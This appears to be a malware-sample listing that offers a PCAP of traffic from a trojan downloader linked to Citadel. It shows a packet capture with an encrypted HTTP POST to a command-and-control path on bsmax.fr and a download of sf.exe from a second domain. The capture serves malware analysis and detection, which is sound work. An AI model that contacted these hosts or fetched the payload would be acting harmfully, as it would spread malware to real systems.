DLL.exe Trojan Downloader Loads Citadel and Unknown Malware PCAP file download

Attachment: 1 pcap dll (Citadel)
Date added: September 24, 2016 4:33 am. Added by: admin. File size: 488 KB.

2016-09-20 02:28:08.567628 IP 192.168.1.102.58384 > 213.186.33.19.80: Flags [P.], seq 0:694, ack 1, win 256, length 694: HTTP: POST /misc/.KhJh2M@/.KhJh2M@//framework.php HTTP/1.1
E…st………f..!….P..(…d.P…~…POST /misc/.KhJh2M@/.KhJh2M@//framework.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: bsmax.fr
Content-Length: 415
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 60gpBAK=R1224197954; 60gp=R1864059519

8.,…….@M0..GH.#..RS..
..g.2..g…;…yLb…..]\..p..4…..Qo..t..Ba……..N..\.p’~.X.o.}z*…[…jA…L…#..T……..hq.$.zx[……!..Z.{D4.o.r..~)..z?.M.h.%……,.`O…=bpI}..V/UJ._XX..0v9..C.d.b…3..f.{}…………..i1…Y…<….5IR&.”…9EX\.h..X.f…Z..*.)Q.1…k?tf#[@.^..W…….+.J..Rg…..}….2…y..:…;..I;…,…..H.}….{8..,…&#(*.Pp…*…#..I…7.Y2..L.m…./…a…8…………….a.2.
2016-09-20 02:28:08.854990 IP 192.168.1.102.51387 > 75.75.75.75.53: 10218+ A? judo-club-solesmois-59.fr. (43)
E..G,……~…fKKKK…5.39]’…………judo-club-solesmois-59.fr…..
2016-09-20 02:28:08.894800 IP 192.168.1.102.58384 > 213.186.33.19.80: Flags [.], ack 407, win 255, length 0
E..(su………f..!….P..*…e.P…?G……..
2016-09-20 02:28:09.049012 IP 192.168.1.102.58385 > 213.186.33.3.80: Flags [S], seq 1303459062, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4jM@……..f..!….PM.4……. ./;…………..
2016-09-20 02:28:09.159956 IP 192.168.1.102.58385 > 213.186.33.3.80: Flags [.], ack 1235911303, win 256, length 0
E..(jN………f..!….PM.4.I…P………….
2016-09-20 02:28:09.160558 IP 192.168.1.102.58385 > 213.186.33.3.80: Flags [P.], seq 0:191, ack 1, win 256, length 191: HTTP: GET /sf.exe HTTP/1.1
E…jO………f..!….PM.4.I…P…|…GET /sf.exe HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Host: judo-club-solesmois-59.fr
Cache-Control: no-cache
